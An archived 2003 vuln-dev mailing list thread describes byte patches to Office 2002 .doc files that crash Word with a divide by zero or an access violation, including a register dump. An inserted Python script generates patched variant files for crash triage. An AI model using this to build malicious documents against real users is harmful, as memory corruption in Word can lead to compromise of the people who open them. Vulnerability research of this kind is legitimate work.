Vulnerability Development mailing list archives
Re: Bug in Microsoft Word
From: Bahaa Naamneh <b_naamneh () hotmail com>
Date: 8 Oct 2003 17:58:09 -0000
In-Reply-To: <oprwngn1zgab5ge7 () smtp2 adsl ya com>

This pattern:

00 00 00 00 00 a3 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 00 00 00 00 00 b4 01 00 00 20 00 00 00 9c 01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00

can be found, I think, in most of the Office 2002 versions. I have found this pattern in two versions, 2002 (10.2627.3311) and 2002 (10.5522.4219) SP-2.

In some versions, like version 2002 (10.2627.2625), this pattern exists:

00 00 00 00 00 00 97 02 00 00 34 00 00 00 69 02 00 00 00 00 00 00 69

or

00 00 00 00 00 00 97 02 00 00 38 00 00 00 69 02 00 00 00 00 00 00 69

If you replace it with:

62 62 62 62 62 62 62 62 62 62 62 62 62 62 62 62 62 62 62 62 62 62 62

it will crash because of a divide by zero. But if you change it to:

00 00 00 00 00 00 97 02 00 00 34 00 00 00 69 02 00 00 00 00 00 62 69

you'll be able to see an access violation such as:

301D33D7 mov ecx,dword ptr [eax]

EAX = 00200072  EBX = 00000002  ECX = 009E366C  EDX = 00000000
ESI = 009D0288  EDI = 00000000  EIP = 301D33D7  ESP = 00126364
EBP = 00000000  EFL = 00000206

------------------------
Bahaa Naamneh
http://www.bsecurity.tk
Date: Tue, 07 Oct 2003 03:49:03 +0200
To: "vuln-dev () securityfocus com" <vuln-dev () securityfocus com>
Subject: Re: Bug in Microsoft Word
From: Pedro Jota Calvorota <calvorota () ya com>
Organization: Calvos Unidos
Message-ID: <oprwngn1zgab5ge7 () smtp2 adsl ya com>
User-Agent: Opera7.20/Win32 M2 build 3144

I would like to make you notice two things:

- I downloaded the doc file from http://www12.brinkster.com/bsecurity/Doc1.doc and checked it with the MS Office XP version and it crashes. Oddly, if I do it with Word 97, it doesn't crash but shows the cursor at the end of the first line :|

- I just can't find the pattern 00 00 00 00 00 a3 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 00 00 00 00 00 b4 01 00 00 20 00 00 00 9c 01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00 in any doc I create, Word 97 or XP... Is it the same in any version? I don't even find the "b4 01" pattern to be able to modify the EAX register. Can you explain it a little deeper?

Thanks a lot.

--
Using M2, Opera's revolutionary e-mail client: http://www.opera.com/m2/
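The search-and-patch step described in the reply (locate a byte sequence inside the .doc, overwrite either the whole run or a single byte, then open the result in Word) is easy to script so that every position of the pattern gets its own variant file. The following is an added example, not code from either poster: the pattern constant is the 23-byte sequence quoted above for build 10.2627.2625, the sample buffer is constructed here and is not Doc1.doc, and the file names and the `write_variants` helper are this example's own choices.

```python
"""Find a byte pattern inside a binary file and emit same-length patched variants.

Added example for the thread above; not the poster's code. SAMPLE_DOC is a
constructed stand-in and is NOT the Doc1.doc referenced in the thread.
"""
from pathlib import Path
from typing import Iterator, List, Tuple

# The 23-byte sequence quoted in the thread for Word 2002 (10.2627.2625),
# the "34" variant; the "38" variant quoted there differs only at index 10.
PATTERN_2625 = bytes.fromhex(
    "00 00 00 00 00 00 97 02 00 00 34 00 00 00 69 02 00 00 00 00 00 00 69"
)

# Constructed stand-in for a .doc: OLE2 compound-file magic, padding,
# the pattern, more padding. Only the pattern bytes matter for this demo.
OLE2_MAGIC = bytes.fromhex("D0 CF 11 E0 A1 B1 1A E1")
SAMPLE_DOC = OLE2_MAGIC + b"\x00" * 16 + PATTERN_2625 + b"\x00" * 16


def find_all(data: bytes, pattern: bytes) -> List[int]:
    """Return every offset at which `pattern` occurs in `data`, overlaps included."""
    offsets, start = [], 0
    while True:
        idx = data.find(pattern, start)
        if idx < 0:
            return offsets
        offsets.append(idx)
        start = idx + 1


def patch(data: bytes, offset: int, replacement: bytes) -> bytes:
    """Return a copy of `data` with `replacement` written in place at `offset`.

    Same-length overwrite only: inserting or deleting bytes would shift every
    offset after the patch, which is a different mutation than the thread's.
    """
    if offset < 0 or offset + len(replacement) > len(data):
        raise ValueError("patch does not fit inside the buffer")
    return data[:offset] + replacement + data[offset + len(replacement):]


def overwrite_pattern(data: bytes, offset: int, length: int, fill: int = 0x62) -> bytes:
    """First mutation from the thread: clobber the whole match with one byte value."""
    return patch(data, offset, bytes([fill]) * length)


def single_byte_variants(data: bytes, offset: int, pattern: bytes,
                         value: int = 0x62) -> Iterator[Tuple[int, bytes]]:
    """Second mutation, generalised: one variant per pattern position set to `value`.

    Index 21 reproduces the "... 00 62 69" change from the thread; the other
    positions are the natural next probes when triaging which field matters.
    """
    for i, original in enumerate(pattern):
        if original != value:
            yield i, patch(data, offset + i, bytes([value]))


def write_variants(src: Path, out_dir: Path, pattern: bytes = PATTERN_2625) -> List[Path]:
    """Read `src`, write every variant for every match into `out_dir`, return the paths."""
    data = src.read_bytes()
    out_dir.mkdir(parents=True, exist_ok=True)
    written: List[Path] = []
    for off in find_all(data, pattern):
        p = out_dir / f"{src.stem}_{off:08x}_all62{src.suffix}"
        p.write_bytes(overwrite_pattern(data, off, len(pattern)))
        written.append(p)
        for i, variant in single_byte_variants(data, off, pattern):
            p = out_dir / f"{src.stem}_{off:08x}_b{i:02d}{src.suffix}"
            p.write_bytes(variant)
            written.append(p)
    return written


if __name__ == "__main__":
    import sys
    # Usage: python patch_doc.py Doc1.doc out/   (writes files only; open them in Word yourself)
    for path in write_variants(Path(sys.argv[1]), Path(sys.argv[2])):
        print(path)
```

Each output file differs from the input in exactly one run of bytes, so a crash in one variant and not another points at the specific field Word mishandles; running the single-byte set is also the quickest way to answer the question above about whether the pattern exists at all in a given build, since `find_all` returning an empty list means nothing gets written.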
Current thread:
- Bug in Microsoft Word Bahaa Naamneh (Oct 03)
- <Possible follow-ups>
- Re: Bug in Microsoft Word Pedro Jota Calvorota (Oct 08)
- RE: Bug in Microsoft Word Arjun Pednekar (Oct 09)
- Re: Bug in Microsoft Word Bahaa Naamneh (Oct 08)